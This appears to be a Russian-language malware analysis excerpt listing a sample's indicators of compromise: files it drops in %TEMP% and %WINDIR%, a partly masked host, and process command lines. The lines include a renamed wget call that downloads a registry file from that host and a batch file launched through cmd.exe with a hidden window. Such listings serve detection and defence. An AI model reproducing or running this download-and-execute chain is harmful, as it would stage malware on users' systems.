Техническая информация
Ниже перечислены пути к файлам, сетевые обращения и командные строки запускаемых процессов.
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %WINDIR%\s.txt
- %WINDIR%\w\libeay32.dll
- %WINDIR%\w\libiconv2.dll
- %WINDIR%\w\libintl3.dll
- %WINDIR%\w\libssl32.dll
- %WINDIR%\w\w.exe
- %WINDIR%\c\cu.exe
- %WINDIR%\n.exe
- %WINDIR%\test12.bat
- %WINDIR%\mt.reg
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- http://c8##8.host/mt.reg
- DNS ASK c8##8.host
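- '%WINDIR%\w\w.exe' -c -P "%WINDIR%" "http://c8##8.host/mt.reg" --referer="0101010010" (параметры -c, -P и --referer, а также лежащие рядом libeay32.dll, libssl32.dll, libiconv2.dll и libintl3.dll характерны для wget; вероятно, w.exe — переименованная сборка wget, сохраняющая mt.reg в %WINDIR%)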
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\test12.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\test12.bat" "